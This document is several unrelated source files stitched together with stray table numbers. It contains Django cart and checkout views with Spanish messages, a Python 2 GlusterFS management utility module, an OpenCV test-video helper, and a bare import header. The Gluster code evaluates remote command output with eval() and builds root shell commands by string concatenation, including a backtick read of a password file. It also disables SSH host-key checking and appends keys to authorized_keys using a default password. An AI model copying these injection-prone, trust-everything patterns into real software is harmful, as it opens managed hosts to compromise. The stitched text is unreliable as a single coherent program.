    # NOTE(review): raises IndexError when the user has no open order --
    # confirm this view is only reachable from the cart page.
    order = order_qs[0]
    if order_item.quantity > 1:
        order_item.quantity -= 1
        order_item.save()
    else:
        # Detaches the line from the order but keeps the OrderItem row
        # (remove_from_cart_summary deletes the row instead) -- TODO confirm
        # the asymmetry is intended.
        order.items.remove(order_item)
        order.save()
        messages.warning(request, f"{item.title} fue eliminado del carrito")
    return redirect('order_summary')
def remove_from_cart_summary(request, slug):
    """Delete the item's cart line entirely (order-summary page action)."""
    item = get_object_or_404(Item, slug=slug)
    # NOTE(review): get_or_create may create a row that is deleted two lines
    # below when the item was not in the cart -- a plain filter would avoid
    # the pointless insert.
    order_item, created = OrderItem.objects.get_or_create(item=item, user=request.user, ordered=False)
    order_qs = Order.objects.filter(user=request.user, ordered=False)
    # Raises IndexError when no open order exists.
    order = order_qs[0]
    OrderItem.objects.filter(id=order_item.id).delete()
    messages.warning(request, f"{item.title} el producto fue eliminado del carrito")
    return redirect('order_summary')
class AfterCheckoutView(DetailView):
    """Post-checkout confirmation page.

    NOTE(review): subclasses DetailView but overrides get() entirely, so no
    model/queryset machinery is used -- plain View would express this better.
    It also still fetches the ordered=False order; confirm the order is only
    flagged as ordered later in the flow.
    """

    def get(self, *args, **kwargs):
        order = Order.objects.get(user=self.request.user, ordered=False)
        context = {
            'order': order
        }
        return render(self.request, 'after_checkout.html', context)
class CheckoutView(View):
    """Checkout page.

    GET renders the address/promo form for the open order. POST handles two
    submit buttons: 'submit_promo' (apply/clear a promo code on the order)
    and 'submit_info' (store the shipping address and e-mail a confirmation).
    """

    def get(self, *args, **kwargs):
        form = AddressForm()
        order = Order.objects.get(user=self.request.user, ordered=False)
        context = {
            'form': form,
            'order': order,
        }
        return render(self.request, 'checkout.html', context)

    def post(self, *args, **kwargs):
        order = Order.objects.get(user=self.request.user, ordered=False)
        form = AddressForm(self.request.POST or None)
        context = {}
        # --- Promo-code branch: replace any existing promo on the order ---
        if 'submit_promo' in self.request.POST:
            if form.is_valid():
                promo_code = form.cleaned_data.get('promo_code')
                promo = Promo.objects.filter(title=promo_code)
                if promo:
                    order.promo.clear()
                    order.promo.add(promo[0])
                    order.save()
                else:
                    # Unknown code: clear any previous promo and warn.
                    order.promo.clear()
                    order.save()
                    # BUGFIX: the accent was mis-encoded ("promociรณn")
                    messages.warning(self.request, f"{promo_code} no es un codigo valido de promoción")
        # --- Contact/address branch ---
        if 'submit_info' in self.request.POST:
            if form.is_valid():
                first_name = form.cleaned_data.get('first_name')
                last_name = form.cleaned_data.get('last_name')
                phone = form.cleaned_data.get('phone')
                email = form.cleaned_data.get('email')
                street_address = form.cleaned_data.get('street_address')
                street_address_2 = form.cleaned_data.get('street_address_2')
                save_info = form.cleaned_data.get('save_info')
                default = form.cleaned_data.get('default')
                use_default = form.cleaned_data.get('use_default')
                state_option = form.cleaned_data.get('state_option')
                payment_option = form.cleaned_data.get('payment_option')
                # Create address and save it
                address = Address(
                    user=self.request.user,
                    street_address=street_address,
                    street_address_2=street_address_2,
                    state_option=state_option,
                )
                address.save()
                # Print form data
                print(form.cleaned_data)
                # Send confirmation e-mail to the customer.
                # BUGFIX: the inverted exclamation mark was mis-encoded ("ยก")
                subject = 'Mascarillas y mas - Su orden fue recibida'
                message = f'¡Gracias por ordenar!\n{first_name} {last_name} Su orden fue recibida. Lo antes posible alguien lo estara contactando para confirmar su orden.'
                from_email = 'chandler240@gmail.com'
                recipient_list = [email,]
                send_mail(subject, message, from_email, recipient_list)
                return redirect('after_checkout')
            else:
                # Required contact fields missing
                # print(form.errors)
                messages.warning(self.request, "Los campos Nombre, Apellido, Telefono y Email son necesarios")
        # always return an address
        return redirect('checkout')
| 7,444 | 2,164 |
# Copyright (C) 2011 Gluster, Inc. <http://www.gluster.com>
# This file is part of Gluster Management Gateway (GlusterMG).
#
# GlusterMG is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published
# by the Free Software Foundation; either version 3 of the License,
# or (at your option) any later version.
#
# GlusterMG is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see
# <http://www.gnu.org/licenses/>.
#
import os
import sys
# Make the script's own directory and the sibling "common" directory
# importable regardless of the current working directory.
p1 = os.path.abspath(os.path.dirname(sys.argv[0]))
p2 = "%s/common" % os.path.dirname(p1)
if not p1 in sys.path:
    sys.path.append(p1)
if not p2 in sys.path:
    sys.path.append(p2)
import re
import syslog
import subprocess
import time
import tempfile
import glob
import commands
import paramiko
import Globals
import XmlHandler
# Sentinel status returned when a command could not be executed at all.
RUN_COMMAND_ERROR = -1024
LOG_SYSLOG = 1
SYSLOG_REQUIRED = False
LOG_FILE_NAME = None
LOG_FILE_OBJ = None
# Set to True by log() after syslog.openlog has been called once.
logOpened = False
# Non-interactive key-based ssh: as a token list (shell=False)...
sshCommandPrefix = "ssh -l root -q -i /opt/glustermg/keys/gluster.pem -o BatchMode=yes -o GSSAPIAuthentication=no -o PasswordAuthentication=no -o StrictHostKeyChecking=no".split()
# ...and as a single string for shell=True invocations.
sshCommandPrefixShell = "ssh -l root -q -i /opt/glustermg/keys/gluster.pem -o BatchMode=yes -o GSSAPIAuthentication=no -o PasswordAuthentication=no -o StrictHostKeyChecking=no"
# Resolve the backend script path from GMG_VERSION, defaulting to 2.4.
# (Python 2 except syntax -- the whole module targets Python 2.)
try:
    commandPath = "/opt/glustermg/%s/backend" % os.environ['GMG_VERSION']
except KeyError, e:
    commandPath = "/opt/glustermg/2.4/backend"
def log(priority, message=None):
    '''
    Write a message to syslog, opening the log on first use.

    Callable either as log(message) -- logged at LOG_INFO -- or as
    log(priority, message) with an explicit syslog priority.
    '''
    global logOpened
    if not logOpened:
        syslog.openlog(os.path.basename(sys.argv[0]))
        logOpened = True
    # Single-argument form: the first positional arg is the message itself
    if type(priority) == type(""):
        logPriority = syslog.LOG_INFO
        logMessage = priority
    else:
        logPriority = priority
        logMessage = message
    # Nothing to log. (The original left commented-out debug code between
    # this guard and a dangling else; flow is now a straight guard.)
    if not logMessage:
        return
    syslog.syslog(logPriority, logMessage)
    return
def isString(value):
    '''Return True when value is exactly a plain or unicode string type.'''
    return type(value) in (type(""), type(u""))
def getTempFileName():
    '''Create an empty temporary file with the GSP_ prefix and return its path.'''
    handle, path = tempfile.mkstemp(prefix="GSP_")
    # Close the low-level descriptor immediately; callers reopen by name.
    os.close(handle)
    return path
def readFile(fileName, lines=False):
    '''
    Return the content of fileName.

    @param fileName: path of the file to read
    @param lines: when True return a list of lines (readlines); otherwise the
        whole file as one string
    On IOError the failure is logged and an empty list/"" is returned.
    (Uses "except ... as" -- valid on Python 2.6+ and 3 -- and a with-block
    so the handle is closed even if the read itself fails.)
    '''
    try:
        with open(fileName) as fp:
            return fp.readlines() if lines else fp.read()
    except IOError as e:
        log("failed to read file %s: %s" % (fileName, str(e)))
        return [] if lines else ""
def writeFile(fileName, content):
    '''
    Write content (a string or a list of lines) to fileName.
    Returns True on success, False on IOError (which is logged).
    Content of any other type results in an empty file and True, matching
    the original behavior.
    (Uses "except ... as" -- valid on Python 2.6+ and 3 -- and a with-block
    so the handle is closed even if the write fails.)
    '''
    try:
        with open(fileName, "w") as fp:
            if isString(content):
                fp.write(content)
            elif type(content) == type([]):
                fp.writelines(content)
        return True
    except IOError as e:
        log("failed to write file %s: %s" % (fileName, str(e)))
        return False
def removeFile(fileName, root=False):
    '''
    Delete fileName. Returns True when the file is gone (including when it
    never existed), False on failure.
    @param root: attempt the removal via sudo rm through runCommand instead
        of os.remove
    '''
    if not os.path.exists(fileName):
        return True
    if root:
        # Privileged removal; runCommand returns 0 on success
        return runCommand("rm %s" % fileName, root=True) == 0
    try:
        os.remove(fileName)
        return True
    except OSError as e:
        # "as" syntax is valid on Python 2.6+ and 3 (was Python-2-only)
        log("Failed to remove file %s: %s" % (fileName, str(e)))
        return False
def runCommandBG(command, stdinFileObj=None, stdoutFileObj=None, stderrFileObj=None,
                 shell=False, root=None):
    '''
    Launch command in the background and return the subprocess.Popen object,
    or None on failure.

    @param command: string (required when shell=True) or argument list
    @param root: True prefixes sudo; a string prefixes sudo -u <root>
    Unset std* file objects default to pipes.
    (Python 2 module: keeps the old "except E, e" syntax.)
    '''
    # Normalize command form: shell mode needs a string, exec mode a list
    if shell:
        if not isString(command):
            return None
    else:
        if isString(command):
            command = command.split()
    # Optional privilege escalation via sudo
    if root == True:
        if shell:
            command = "sudo " + command
        else:
            command = ['sudo'] + command
    elif isString(root):
        if shell:
            command = "sudo -u " + root + " " + command
        else:
            command = ['sudo', '-u', root] + command
    if not stdinFileObj:
        stdinFileObj=subprocess.PIPE
    if not stdoutFileObj:
        stdoutFileObj=subprocess.PIPE
    if not stderrFileObj:
        stderrFileObj=subprocess.PIPE
    try:
        process = subprocess.Popen(command,
                                   bufsize=-1,
                                   stdin=stdinFileObj,
                                   stdout=stdoutFileObj,
                                   stderr=stderrFileObj,
                                   shell=shell)
        return process
    except OSError, e:
        log("runCommandBG(): Failed to run command [%s]: %s" % (command, e))
        return None
def runCommand(command,
               input='', output=False,
               shell=False, root=None):
    '''
    Run command synchronously, feeding it `input` on stdin via a temp file.

    Returns the exit status, or -- when output=True -- a dict with keys
    "Status", "Stdout" and "Stderr". Status is RUN_COMMAND_ERROR when the
    command could not be started at all.
    (Python 2 module: keeps the old "except E, e" syntax.)
    '''
    rv = {}
    rv["Status"] = RUN_COMMAND_ERROR
    rv["Stdout"] = None
    rv["Stderr"] = None
    # Stage stdin/stdout/stderr through temp files so output can be re-read
    try:
        stdinFileName = getTempFileName()
        stdinFileObj = open(stdinFileName, "w")
        stdinFileObj.write(input)
        stdinFileObj.close()
        stdinFileObj = open(stdinFileName, "r")
        stdoutFileName = getTempFileName()
        stdoutFileObj = open(stdoutFileName, "w")
        stderrFileName = getTempFileName()
        stderrFileObj = open(stderrFileName, "w")
    except IOError, e:
        log("Failed to create temporary file for executing command [%s]: %s" % (command, e))
        if output:
            return rv
        return rv["Status"]
    stdoutContent = None
    stderrContent = None
    process = runCommandBG(command,
                           stdinFileObj=stdinFileObj,
                           stdoutFileObj=stdoutFileObj,
                           stderrFileObj=stderrFileObj,
                           shell=shell, root=root)
    # NOTE(review): when the process fails to start (None), the three temp
    # files are never removed and the open file objects are never closed --
    # a small resource leak on every failed invocation.
    if process:
        rv['Status'] = process.wait()
        rv['Stdout'] = readFile(stdoutFileName)
        rv['Stderr'] = readFile(stderrFileName)
        os.remove(stdinFileName)
        os.remove(stdoutFileName)
        os.remove(stderrFileName)
    if output:
        return rv
    return rv["Status"]
def daemonize():
    '''
    Detach the current process as a daemon using the classic double fork.
    Returns True in the fully daemonized child; False if either fork fails.
    (Python 2 only: uses the file() builtin and old except syntax.)
    '''
    try:
        pid = os.fork()
        if pid > 0:
            # exit first parent
            sys.exit(0)
    except OSError, e:
        #sys.stderr.write("fork #1 failed: %d (%s)\n" % (e.errno, e.strerror))
        return False
    # decouple from parent environment
    os.chdir("/")
    os.setsid()
    os.umask(0)
    # do second fork (prevents the daemon from ever re-acquiring a tty)
    try:
        pid = os.fork()
        if pid > 0:
            # exit from second parent
            sys.exit(0)
    except OSError, e:
        #sys.stderr.write("fork #2 failed: %d (%s)\n" % (e.errno, e.strerror))
        return False
    # redirect standard file descriptors to /dev/null
    sys.stdout.flush()
    sys.stderr.flush()
    si = file("/dev/null", 'r')
    so = file("/dev/null", 'a+')
    se = file("/dev/null", 'a+', 0)
    os.dup2(si.fileno(), sys.stdin.fileno())
    os.dup2(so.fileno(), sys.stdout.fileno())
    os.dup2(se.fileno(), sys.stderr.fileno())
    return True
def getMeminfo():
    '''
    Parse /proc/meminfo into a dict of {field name: value in kB}, adding a
    derived 'MemUsed' entry (total - free - buffers - cached).
    '''
    result = {}
    parser = re.compile(r'^(?P<key>\S*):\s*(?P<value>\d*)\s*kB')
    for line in readFile("/proc/meminfo", lines=True):
        entry = parser.match(line)
        if entry is None:
            continue  # skip lines that don't parse
        result[entry.group('key')] = int(entry.group('value'))
    result['MemUsed'] = (result['MemTotal'] - result['MemFree'] - result['Buffers'] - result['Cached'])
    return result
def _getCpuStatList():
    '''Return the first four cpu counters from /proc/stat as a float list, or None.'''
    statLines = readFile("/proc/stat", lines=True)
    if not statLines:
        return None
    # Fields 1-4 of the aggregate "cpu" line: user, nice, system, idle
    return [float(v) for v in statLines[0].split()[1:5]]
def getCpuUsageAvg():
    '''
    Sample /proc/stat twice, one second apart, and return the CPU usage
    percentage over that interval; None when /proc/stat is unreadable.
    (Python 2 module: keeps the old "except E, e" syntax.)
    '''
    st1 = _getCpuStatList()
    #time1 = time.time()
    time.sleep(1)
    st2 = _getCpuStatList()
    #time2 = time.time()
    if not (st1 and st2):
        return None
    # Busy time delta = user + nice + system; index 3 is idle
    usageTime = (st2[0] - st1[0]) + (st2[1] - st1[1]) + (st2[2] - st1[2])
    try:
        return (100.0 * usageTime) / (usageTime + (st2[3] - st1[3]))
    except ZeroDivisionError, e:
        return 0
def convertKbToMb(kb):
    '''Convert a kilobyte count to megabytes (float result).'''
    kbPerMb = 1024.0
    return kb / kbPerMb
def getDeviceFormatStatusFile(device):
    '''Path of the format status file for device (slashes become underscores).'''
    token = device.replace('/', '_')
    return "/var/tmp/format_%s.status" % token
def getDeviceFormatLockFile(device):
    '''Path of the format lock file for device (slashes become underscores).'''
    token = device.replace('/', '_')
    return "/var/lock/format_%s.lock" % token
def getDeviceFormatOutputFile(device):
    '''Path of the format output file for device (slashes become underscores).'''
    token = device.replace('/', '_')
    return "/var/tmp/format_%s.out" % token
def getGlusterVersion():
    '''Return the installed gluster version string, or None when the query fails.'''
    rv = runCommand("/usr/sbin/gluster --version", output=True)
    # Any stderr output, non-zero exit, or empty stdout means failure
    if rv["Stderr"] or rv["Status"] != 0 or not rv["Stdout"]:
        return None
    # Second whitespace token of the first line is the version number
    return rv["Stdout"].strip().split()[1]
def getCifsUserUid(userName):
    '''Look up userName in the CIFS user file ("uid:name" lines) and return
    its numeric uid, or None when not found.'''
    for entry in readFile(Globals.CIFS_USER_FILE, lines=True):
        entry = entry.strip()
        if not entry:
            continue
        fields = entry.split(":")
        if fields[1] == userName:
            return int(fields[0])
    return None
def grunOfOutput(serverFile, command, argumentList=[]):
    '''
    Run a backend command over ssh on every server listed in serverFile and
    concatenate the (eval'd) stdout lists of the servers that succeeded.
    Returns [] when the server list is empty.
    NOTE(security): stdout of the remote command is passed to eval(); the
    remote backend scripts are trusted here, but any compromise of a managed
    node becomes code execution on this host.
    '''
    output = []
    commandList = ["%s/%s" % (commandPath, command)] + argumentList
    ## junli.li - get rid of white lines
    serverNameListTmp = readFile(serverFile, lines=True)
    serverNameList = []
    for serverName in serverNameListTmp:
        if serverName.strip():
            serverNameList.append(serverName)
    if not serverNameList:
        return []
    status = True
    for serverName in serverNameList:
        rv = runCommand(sshCommandPrefix + [serverName.strip()] + commandList, output=True)
        # if rv["Status"] != 0:
        #     sys.stderr.write("%s: %s\n" % (serverName.strip(), rv["Status"]))
        #     sys.stderr.write("Stdout:\n%s\n" % rv["Stdout"])
        #     sys.stderr.write("Stderr:\n%s\n" % rv["Stderr"])
        #     sys.stderr.write("---\n")
        #     status = False
        # else :
        # junli.li - only get the bricks info from good nodes
        if rv["Status"] == 0:
            output = output + eval(rv["Stdout"])
    # if status:
    return output
    # else:
    #     return 2
def grun(serverFile, command, argumentList=[]):
    '''
    Run a backend command over ssh on every server listed in serverFile.
    Returns 0 when all servers succeed, 1 when the server list is empty,
    2 when any server fails (failures are reported on stderr).
    '''
    remoteCommand = ["%s/%s" % (commandPath, command)] + argumentList
    ## junli.li - get rid of white lines
    servers = [name for name in readFile(serverFile, lines=True) if name.strip()]
    if not servers:
        return 1
    allOk = True
    for server in servers:
        rv = runCommand(sshCommandPrefix + [server.strip()] + remoteCommand, output=True)
        if rv["Status"] != 0:
            sys.stderr.write("%s: %s\n" % (server.strip(), rv["Status"]))
            sys.stderr.write("Stdout:\n%s\n" % rv["Stdout"])
            sys.stderr.write("Stderr:\n%s\n" % rv["Stderr"])
            sys.stderr.write("---\n")
            allOk = False
    return 0 if allOk else 2
def grunAddCifsUser(serverFile, command, argumentList):
    '''
    Run the add-CIFS-user backend command on every server in serverFile,
    passing uid, name and -- via a remote `cat` of argumentList[2] -- the
    password. Returns 0 on success, 1 for an empty server list, 2 on failure.
    NOTE(security): the remote command line is built by string concatenation
    and executed through a shell (shell=True), and the password is expanded
    on the remote command line; inputs are trusted management-gateway data,
    but this pattern is shell-injection prone.
    '''
    commandList = "%s/%s" % (commandPath, command) + " " + argumentList[0] + " " + argumentList[1] + " " + "`cat " + argumentList[2] + "`"
    ## junli.li - get rid of white lines
    serverNameListTmp = readFile(serverFile, lines=True)
    serverNameList = []
    for serverName in serverNameListTmp:
        if serverName.strip():
            serverNameList.append(serverName)
    if not serverNameList:
        return 1
    status = True
    for serverName in serverNameList:
        rv = runCommand(sshCommandPrefixShell + " " + serverName.strip() + " " + commandList , shell=True, output=True)
        if rv["Status"] != 0:
            sys.stderr.write("%s: %s\n" % (serverName.strip(), rv["Status"]))
            sys.stderr.write("Stdout:\n%s\n" % rv["Stdout"])
            sys.stderr.write("Stderr:\n%s\n" % rv["Stderr"])
            sys.stderr.write("---\n")
            status = False
    if status:
        return 0
    else:
        return 2
def grunChangeCifsUserPasswd(serverFile, command, argumentList):
    '''
    Run the change-CIFS-password backend command on every server in
    serverFile, reading the new password remotely via `cat argumentList[1]`.
    Returns 0 on success, 1 for an empty server list, 2 on failure.
    NOTE(security): like grunAddCifsUser, this builds a shell command by
    concatenation and runs it with shell=True -- shell-injection prone.
    '''
    commandList = "%s/%s" % (commandPath, command) + " " + argumentList[0] + " `cat " + argumentList[1] + "`"
    ## junli.li - get rid of white lines
    serverNameListTmp = readFile(serverFile, lines=True)
    serverNameList = []
    for serverName in serverNameListTmp:
        if serverName.strip():
            serverNameList.append(serverName)
    if not serverNameList:
        return 1
    status = True
    for serverName in serverNameList:
        rv = runCommand(sshCommandPrefixShell + " " + serverName.strip() + " " + commandList , shell=True, output=True)
        if rv["Status"] != 0:
            sys.stderr.write("%s: %s\n" % (serverName.strip(), rv["Status"]))
            sys.stderr.write("Stdout:\n%s\n" % rv["Stdout"])
            sys.stderr.write("Stderr:\n%s\n" % rv["Stderr"])
            sys.stderr.write("---\n")
            status = False
    if status:
        return 0
    else:
        return 2
def getFileSystemType():
    '''List the filesystem types that have a /sbin/mkfs.* helper installed.'''
    fsTypes = []
    for helper in glob.glob("/sbin/mkfs.*"):
        # "mkfs.ext4" -> "ext4"
        fsTypes.append(os.path.basename(helper).split('.')[1])
    return fsTypes
##########added by bin.liu 2013-4-27
def executeOnServer(serverName, commandWithArgs):
    '''
    Run commandWithArgs locally when serverName is this host, otherwise over
    ssh using the configured private key.
    Returns (status, output): 0 success, 1 command error, -1 connect failure,
    -2 ssh client setup failure.
    ("except ... as" is valid on Python 2.6+ and 3.)
    '''
    if isLocalHost(serverName) == True:
        (status, message) = commands.getstatusoutput(commandWithArgs)
        if status:
            return 1, message
        return status, message
    output = ''
    try:
        ssh = paramiko.SSHClient()
        ssh.load_system_host_keys()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    except Exception as e:
        return -2, 'Error when using pub key to connect remote host [%s]' % str(e)
    try:
        key = paramiko.RSAKey.from_private_key_file(Globals.PKEYFILE)
        ssh.connect(serverName, Globals.PORT, Globals.USERNAME, pkey=key)
        stdin, stdout, stderr = ssh.exec_command(commandWithArgs)
        output = stdout.read()
        ssh.close()
        strerr = stderr.read()
        # BUGFIX: compare by value, not identity -- "x is ''" only worked by
        # accident of CPython string interning
        if strerr is None or strerr.strip() == '':
            return 0, output
        return 1, strerr
    except Exception as e:
        return -1, "cannot connect " + serverName + ': ' + str(e)
def executeWithPasswd(serverName, cmd):
    """Execute cmd on serverName over SSH using password authentication
    (Globals.DEFAULT_PASSWD).

    Returns (status, output): 0/stdout on success, 1/stderr on command
    failure, -2 on client setup failure, -1 on connect failure.
    """
    try:
        ssh = paramiko.SSHClient()
        ssh.load_system_host_keys()
    except Exception as e:
        return -2, 'Error when using pub key to connect remote host %s' % str(e)
    try:
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        ssh.connect(serverName, Globals.PORT, Globals.USERNAME, Globals.DEFAULT_PASSWD)
        stdin, stdout, stderr = ssh.exec_command(cmd)
        ret = stdout.read()
        strerr = stderr.read()
        # BUG FIX: "is ''" identity comparison replaced with value equality.
        if strerr is None or strerr.strip() == '':
            return 0, ret
        return 1, strerr
    except Exception as e:
        # BUG FIX: the original wrote "'...[%s]:%s' % serverName, str(e)",
        # which raised TypeError (two placeholders, one argument) and would
        # have produced a 3-tuple; format with both values.
        return -1, 'can not connect to server [%s]:%s' % (serverName, str(e))
def installPubKey(serverName):
    """Append this host's public key to the remote server's authorized_keys
    file, authenticating with the default password.

    Returns (code, message) where code '0' means success and the other
    codes are project-specific error identifiers.
    """
    if isLocalHost(serverName):
        return '0', 'local host'
    if not os.path.exists(Globals.PUBKEYFILE):
        return '26060', Globals.PUBKEYFILE + ' does not exist.'
    key = os.popen('cat ' + Globals.PUBKEYFILE).read()
    key = key.replace('\n', ' ')
    cmd = '''echo ''' + key + ''' >> ''' + Globals.SSH_AUTHORIZED_KEYS_PATH_REMOTE
    status, output = executeWithPasswd(serverName, cmd)
    if status == -1:
        return '26104', output
    elif status == -2:
        # BUG FIX: the original wrote "'...[%s].[%s]' % serverName, output",
        # which raised TypeError (two placeholders, one argument) and would
        # have returned a 3-tuple; format with both values.
        return '26059', 'Error when using pub key to connect remote server [%s].[%s]' % (serverName, output)
    elif status == 1:
        # BUG FIX: same %-formatting / tuple-arity defect as above.
        return '26062', 'error when installing keys on server [%s]. %s' % (serverName, output)
    return '0', ''
def isOnline(serverName):
    """Return True when serverName is this host or can be reached over SSH
    with the default credentials, False otherwise."""
    local_name = os.popen("hostname").read()
    if local_name.strip() == serverName:
        return True
    port = 22
    username = 'root'
    pkey_file = Globals.PKEYFILE
    try:
        # load the private key, then attempt a password-authenticated connect
        key = paramiko.RSAKey.from_private_key_file(pkey_file)
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        client.load_system_host_keys()
        client.connect(serverName, Globals.PORT, Globals.USERNAME, Globals.DEFAULT_PASSWD)
        return True
    except Exception:
        # any failure (key load, DNS, auth, timeout) counts as offline
        return False
def errorCode(code, msg, params):
    """Build an <error> XML fragment containing the code, message and
    optional parameter list, and return it serialized as a string."""
    response_dom = XmlHandler.ResponseXml()
    error_node = response_dom.appendTagRoute("error")
    error_node.appendChild(response_dom.createTag("code", code))
    error_node.appendChild(response_dom.createTag("msg", msg))
    if params is not None:
        for param in params:
            error_node.appendChild(response_dom.createTag("param", param))
    return error_node.toxml()
def isEmpty(var):
    """Return True when var is None or its string form is blank (empty or
    whitespace-only), False otherwise.

    BUG FIX: the original used "str(var).strip() is ''", an identity
    comparison that only works when the interpreter happens to intern the
    empty string; compare by value instead.
    """
    if var is None:
        return True
    return str(var).strip() == ''
def isLocalHost(serverName):
    """Return True when serverName refers to the machine we are running on:
    the hostname, 'localhost', 127.0.0.1, or the local IP address."""
    hostName = os.popen('hostname').read().split('\n')[0]
    stats, ip = getLocal_IP()
    # (removed an unused "cat /etc/hosts | grep <ip>" shell lookup whose
    # result was never read)
    if (serverName.strip() == hostName.strip()) or \
       (serverName.strip() == 'localhost') or \
       (serverName.strip() == '127.0.0.1') or \
       (ip == serverName):
        return True
    return False
def isIPAddr(serverName):
    """Return True when serverName starts with a dotted-quad IPv4 address
    (each octet 0-255), False otherwise."""
    octet = "((?!\\d\\d\\d)\\d+|1\\d\\d|2[0-4]\\d|25[0-5])"
    pattern = "\\b" + octet + "\\." + octet + "\\." + octet + "\\." + octet + "\\b"
    return re.match(pattern, serverName) is not None
def getIPByName(serverName):
    """Resolve serverName to an IP address: return it unchanged when it is
    already an IP, otherwise look it up in /etc/hosts and return the first
    column of the matching line."""
    if isIPAddr(serverName):
        return serverName
    hosts_line = os.popen('cat /etc/hosts | grep ' + serverName).read()
    return hosts_line.replace('\t', ' ').split(' ')[0]
def getHosts(serverName):
    """Return (0, hostnames) for serverName plus every gluster peer it
    reports, resolving each peer through the remote /etc/hosts.

    On any remote command failure, returns that command's (status, output).
    """
    cmd = 'gluster peer status|grep Hostname'
    status, output = executeOnServer(serverName, cmd)
    if status:
        return status, output
    hosts = [serverName]
    for line in output.split('\n'):
        parts = line.split(':')
        if len(parts) != 2:
            # stop at the first line that is not "Hostname: <name>"
            break
        status, host = executeOnServer(serverName, 'cat /etc/hosts | grep ' + parts[1])
        if status:
            return status, host
        # BUG FIX: "host.strip() is ''" identity comparison replaced with a
        # value test.
        if host is None or host.strip() == '':
            continue
        hosts.append(host.replace('\t', ' ').split(' ')[1])
    return 0, hosts
def getLocal_IP():
    """Return (status, ip) for the first broadcast-capable IPv4 address
    reported by ifconfig."""
    ipv4_cmd = ("ifconfig|grep inet|grep -v inet6|grep Bcast"
                "|cut -d ':' -f2|cut -d ' ' -f1|awk 'NR==1'")
    return commands.getstatusoutput(ipv4_cmd)
def rebalanceTaskStart(clusterName, volumeName):
    """Record a volume-rebalance task (operation_id 3) in the task_info
    table. Returns (0, 'inserted into DB') on success, (1, error) on
    database failure."""
    try:
        Globals.db.insert('task_info',
                          reference=volumeName,
                          description='Volume ' + volumeName + ' Rebalance',
                          operation_id=3,
                          cluster_name=clusterName)
    except Exception as e:
        return (1, str(e))
    return (0, 'inserted into DB')
def getRebalanceStatus(output):
    """Map the rebalance command's output text to a (code, message) pair.

    BUG FIX: the original compared re.match() results against -1
    ("re.match(...) != -1"); re.match returns a Match object or None,
    never -1, so the first branch was always taken and every output was
    reported as SUCCESS. Use the match result's truthiness instead.
    """
    if re.match('^rebalance completed.*', output):
        code = Globals.STATUS_CODE_SUCCESS
        message = 'rebalance completed'
    elif re.match('.*in progress.*', output):
        code = Globals.STATUS_CODE_RUNNING
        message = 'rebalance is running'
    else:
        code = Globals.STATUS_CODE_FAILURE
        message = 'rebalance failed'
    return code, message
def getInitialStatus(output):
    """Map disk-initialization output (which begins with one of the
    STATUS_CODE_* tokens) to a (code, message) pair."""
    if re.match('STATUS_CODE_SUCCESS', output):
        return Globals.STATUS_CODE_SUCCESS, 'initialize disk successfully'
    if re.match('STATUS_CODE_RUNNING', output):
        return Globals.STATUS_CODE_RUNNING, 'initializing disk is running'
    # STATUS_CODE_FAILURE and any unrecognised output both map to failure
    return Globals.STATUS_CODE_FAILURE, 'initialize disk failed'
def getMigrateStatus(message):
    """Map replace-brick migration output to a (code, message) pair.

    BUG FIXES: the first condition's second re.match() call was missing its
    string argument, raising TypeError whenever the first pattern matched;
    and the RUNNING branch returned a bare string instead of the
    (code, message) pair every other branch returns.

    NOTE(review): the first branch requires the text to match both
    "...Migration complete$" and "...Current file=" prefixes, which look
    mutually exclusive -- confirm the intended COMMIT_PENDING trigger.
    """
    if re.match("^Number of files migrated.*Migration complete$", message) and \
            re.match("^Number of files migrated = 0 .*Current file=", message):
        code = Globals.STATUS_CODE_COMMIT_PENDING
        return code, message
    elif re.match("^Number of files migrated.*Current file=.*", message):
        code = Globals.STATUS_CODE_RUNNING
        return code, "Brick Migration Started."
    elif re.match("^replace brick has been paused.*", message):
        code = Globals.STATUS_CODE_PAUSE
        return code, "Brick Migration Paused"
    elif re.match("replace-brick not started on volume*", message):
        code = Globals.STATUS_CODE_SUCCESS
        return code, "Brick Migration Committed."
    else:
        code = Globals.STATUS_CODE_FAILURE
        return code, message
| 20,700 | 6,837 |
import cv2 as cv
import numpy as np
def generate_test_video(frames=1000):
    """Yield test frames where each frame shows its index drawn in the
    centre and encoded in the top-left pixel.

    To decode the index from a frame:
        pixel = image[0][0]
        index = pixel[0]*256**2 + pixel[1]*256 + pixel[2]

    :param frames: number of frames to generate.
    :return: generator of uint8 images of shape (64, 96, 3).
    """
    height, width, channels = 64, 96, 3
    for index in range(frames):
        frame = np.zeros((height, width, channels))
        cv.putText(frame, str(index), (32, 48), cv.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 4)
        # encode the frame index into the top-left pixel as base-256 digits
        frame[0, 0] = (index // 256**2, (index % 256**2) // 256, index % 256)
        yield frame.astype(np.uint8)
def parse_test_video_pixel(pixel):
    """Decode the frame index stored in a test-video's top-left pixel
    (inverse of the encoding done by generate_test_video)."""
    blue, green, red = pixel[0], pixel[1], pixel[2]
    return (blue * 256 + green) * 256 + red
def write_video(output_dir, images, img_size, fps=20):
    """Write the given frames to a video file at output_dir.

    NOTE(review): fourcc -1 asks OpenCV to choose (or prompt for) a codec;
    behaviour is platform-dependent -- confirm this is intended.
    """
    writer = cv.VideoWriter(output_dir, -1, fps, img_size)
    for frame in images:
        writer.write(frame)
    writer.release()
def get_format(video_path: str) -> tuple:
    """Return the four FOURCC character codes of video_path's codec as a
    tuple of ints (least-significant byte first).

    BUG FIX: '>>' binds tighter than '&' in Python, so the original
    'fourcc & 0xFF00 >> 8' parsed as 'fourcc & (0xFF00 >> 8)' and every
    byte after the first came out wrong; shift before masking instead.
    """
    cap = cv.VideoCapture(video_path)
    fourcc = int(cap.get(cv.CAP_PROP_FOURCC))
    cap.release()
    return tuple((fourcc >> shift) & 0xFF for shift in (0, 8, 16, 24))
| 1,243 | 584 |
import importlib
import logging
import threading
from time import sleep
import timeout_decorator
from django_pglocks import advisory_lock
from django.conf import settings
from django.db import transaction
from django.db.models import Q
from django.utils import timezone
